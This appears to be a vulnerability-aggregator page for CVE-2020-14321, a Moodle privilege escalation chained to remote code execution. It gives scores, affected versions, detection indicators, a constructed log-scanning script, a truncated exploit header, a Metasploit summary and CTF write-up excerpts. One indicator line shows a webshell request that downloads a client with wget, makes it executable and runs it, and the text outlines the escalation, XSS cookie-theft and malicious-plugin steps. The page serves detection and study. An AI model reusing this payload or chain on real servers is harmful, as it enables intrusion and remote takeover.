CVE-2020-14321
Published 2022-08-16

CVE-2020-14321: In Moodle before 3.9.1, 3.8.4, 3.7.7 and 3.5.13, teachers of a course were able to assign themselves the manager role within that course.

Priority: P2 · 69 · high · 8.8 (CVSS 3.1)
CVSS vector: AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
Exploit: public exploit available
EPSS: 16.43% (96.6th percentile)
Affected (9 ranges)
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| moodle | moodle | — | — |
| moodle | moodle | — | — |
| moodle | moodle | >= 0 < 3.5.13 | 3.5.13 |
| moodle | moodle | >= 3.5.0 < 3.5.13 | 3.5.13 |
| moodle | moodle | >= 3.6.0-beta < 3.7.7 | 3.7.7 |
| moodle | moodle | >= 3.7.0 < 3.7.7 | 3.7.7 |
| moodle | moodle | >= 3.8.0 < 3.8.4 | 3.8.4 |
| moodle | moodle | >= 3.8.0-beta < 3.8.4 | 3.8.4 |
| moodle | moodle | >= 3.9.0-beta < 3.9.1 | 3.9.1 |
Detection & IOCs (extracted from sources)

Command indicator (request line observed in the exploit traffic): `GET /moodle/blocks/rce/lang/en/block_rce.php?cmd=wget+10.10.132.8%3a1234/client+%26%26+chmod+%2bx+client+%26%26+./client+%26 HTTP/1.1`
- The exploit chain requires a teacher-authenticated session. The initial access vector is privilege escalation via course enrolment: the teacher assigns themselves the manager role using /enrol/manual/ajax.php with roletoassign=1.
- Detect POST/GET requests to /enrol/manual/ajax.php with the parameter roletoassign=1 from a teacher-level session; this indicates a privilege escalation attempt.
- Detect access to /course/loginas.php, which the exploit uses to impersonate a manager account after privilege escalation.
- Detect POSTs to Moodle's role definition endpoint with action=edit&roleid=1 and a large capability list: this is the manager role modification step that enables plugin installation.
- Detect HTTP requests to /blocks/rce/lang/en/block_rce.php with a cmd= query parameter: this is the webshell dropped by the malicious plugin.
- An XSS payload injected into the MoodleNet Profile field has been used to steal teacher session cookies; monitor for script tags or Image() src exfiltration patterns in profile update requests.
- The exploit requires a Referer header matching the Moodle base URL; requests lacking a Referer header are rejected by some configurations. Detection should account for exploit scripts that add Referer headers.
- Post-exploitation: the attacker uploads a malicious plugin (rce.zip / block_rce) via Moodle's plugin install interface. Monitor for zip file uploads to the Moodle admin plugin install endpoint followed by new PHP files appearing under /blocks/.
- The exploit requires the attacker to already have a teacher-level authenticated session (credentials or a valid MoodleSession cookie). Unauthenticated exploitation is not possible.
- The exploit depends on a manager user existing in the course or being enrollable; the attacker must know or discover the manager's user ID (the PoC assumes 25 by default).
- Affected Moodle versions: 3.9 (before 3.9.1), 3.8 to 3.8.3, 3.7 to 3.7.6, 3.5 to 3.5.12 and earlier unsupported versions.
- The Metasploit module notes that manual cleanup is required after exploitation: students enrolled in the course during the attack are not automatically removed.
- The PoC script is sensitive to Moodle state; prior enumeration of or interaction with the Moodle instance can break the exploit flow.
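As an added example (not taken from any of the sources above), the following script applies three of the indicators listed here (manager self-assignment via /enrol/manual/ajax.php, /course/loginas.php impersonation, and a cmd= request to a PHP file under a block plugin's lang directory) to web server access logs. The log lines, IP addresses and timestamps are constructed for the example.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines (common log format); hosts, IDs and paths are made up.
SAMPLE_LOG = """\
10.0.0.5 - - [16/Aug/2022:10:01:02 +0000] "POST /moodle/enrol/manual/ajax.php?id=2&action=enrol&roletoassign=1&userlist[]=25 HTTP/1.1" 200 51
10.0.0.5 - - [16/Aug/2022:10:01:30 +0000] "GET /moodle/course/loginas.php?id=2&user=25&sesskey=abc HTTP/1.1" 303 0
10.0.0.9 - - [16/Aug/2022:10:02:00 +0000] "GET /moodle/course/view.php?id=2 HTTP/1.1" 200 8123
10.0.0.5 - - [16/Aug/2022:10:03:11 +0000] "GET /moodle/blocks/rce/lang/en/block_rce.php?cmd=id HTTP/1.1" 200 87
10.0.0.7 - - [16/Aug/2022:10:04:00 +0000] "POST /moodle/enrol/manual/ajax.php?id=2&action=enrol&roletoassign=5&userlist[]=31 HTTP/1.1" 200 51
"""

# Common log format: client, identity, user, [timestamp], "METHOD target protocol", status
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})')


def classify(target):
    """Return the indicator name for one request target, or None if nothing matches."""
    parts = urlsplit(target)
    qs = parse_qs(parts.query)
    # Step 1: manager role (roleid 1 in the PoC) self-assigned through manual enrolment.
    if parts.path.endswith('/enrol/manual/ajax.php') and qs.get('roletoassign') == ['1']:
        return 'manager-role-assignment'
    # Step 2: 'login as' used to impersonate the manager account reached in step 1.
    if parts.path.endswith('/course/loginas.php'):
        return 'loginas-impersonation'
    # Step 4: webshell dropped by the malicious block plugin, driven through a cmd= parameter.
    if re.search(r'/blocks/[^/]+/lang/[^/]+/[^/]+\.php$', parts.path) and 'cmd' in qs:
        return 'block-plugin-webshell'
    return None


def scan_log(text):
    """Return (source_ip, timestamp, indicator, target) for every suspicious line."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        label = classify(m['target'])
        if label:
            hits.append((m['ip'], m['ts'], label, m['target']))
    return hits


if __name__ == '__main__':
    for hit in scan_log(SAMPLE_LOG):
        print(*hit)
```

When the enrolment parameters travel in a POST body rather than the query string, a plain access log records only the path, so run the same check against a reverse-proxy or WAF log that captures request parameters.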
CVSS provenance

- NVD (v3.1): 8.8 HIGH, CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
- OSV: 8.8 HIGH
GHSA · 2022-08-17 · HIGH · CWE-863
Moodle Incorrect Authorization vulnerability
OSV · 2022-08-17 · HIGH
Moodle Incorrect Authorization vulnerability
OSV · 2022-08-16 · CVSS 8.8 · HIGH
CVE-2020-14321: In Moodle before 3
No detection rules found.
Exploit-DB · 2021-08-05 · CVSS 8.8 · HIGH
Moodle 3.9 - Remote Code Execution (RCE) (Authenticated)

```python
# Exploit Title: Moodle 3.9 - Remote Code Execution (RCE) (Authenticated)
# Date: 12-05-2021
# Exploit Author: lanz
# Vendor Homepage: https://moodle.org/
# Version: Moodle 3.9
# Tested on: FreeBSD
#!/usr/bin/python3
## Moodle 3.9 - RCE (Authenticated as teacher)
## Based on PoC and Payload to assign full permissions to manager role:
## * https://github.com/HoangKien1020/CVE-2020-14321
## Repository: https://github.com/lanzt/CVE-2020-14321/blob/main/CVE-2020-14321_RCE.py
import string, random
import requests, re
import argparse
import base64
import signal
import time
from pwn import *

class Color:
    BLUE = '\033[94m'
    GREEN = '\033[92m'
    YELLOW = '\033[93m'
    RED = '\033[91m'
    END = '\033[0m'

def def_handler(sig, frame):
    print(Co
```
Metasploit
Moodle Teacher Enrollment Privilege Escalation to RCE

Moodle versions 3.9, 3.8 to 3.8.3, 3.7 to 3.7.6, 3.5 to 3.5.12 and earlier unsupported versions allow a teacher to chain an exploit to RCE. A bug in the privileges system allows a teacher to add themselves as a manager to their own class. They can then add any other users, and thus look to add someone with manager privileges on the system (not just the class). After adding a system manager, a 'loginas' feature is used to access their account. Next the system is reconfigured to allow all users to install an addon/plugin. Then a malicious theme is uploaded and creates an RCE. If all of that is a success, we revert permissions for managers to the system default and remove our malicious theme. Manual cleanup to remove students from the cla
CTF · tryhackme-rooms / plottedlms · CVSS 8.8 · HIGH

# Plotted LMS

A fairly hard room, largely due to the breadth of the enumeration and its numerous rabbit holes, plus some instability mixed with dickery in the foothold path.

1. A rustscan scan reveals four websites, on ports 80, 873, 8820 and 9020. All show a default Apache page.
2. Using ffuf with the medium directory wordlist on each reveals three sites: :873/rail, :8820/learn and :9020/moodle. The first two look to be custom built, but the last is a regular Moodle instance.
3. Running moodlescan against the Moodle URL reveals it is version 3.9 beta. This version is vulnerable to CVE-2020-14321, an authenticated remote code execution vulnerability.
4. The vuln requires the creds or cookie of a 'teacher'. Fortunately the site allows registration, so I register a `test123:Test-123` user. Furthermore,
CTF · Schooled / README · CVSS 8.8 · HIGH

# Schooled - HackTheBox

FreeBSD, 30 Base Points, Medium

## Machine

## TL;DR

To solve this machine, we begin by enumerating open services using `nmap`, finding ports `80` and `22`.

***User***: Register on the Moodle system, inject an [XSS](https://owasp.org/www-community/attacks/xss/) payload into the `MoodleNet Profile` field to get the teacher's cookies, use [CVE-2020-14321](https://github.com/HoangKien1020/CVE-2020-14321) to install a plugin which leads to a shell, find DB credentials in the `/usr/local/www/apache24/data/moodle/config.php` file, and in the DB find the hashed password of the `jamie` user.

***Root***: By running `sudo -l` we can see we have permission to install FreeBSD packages as root (`(ALL) NOPASSWD: /usr/sbin/pkg install`). Create a custom package and ins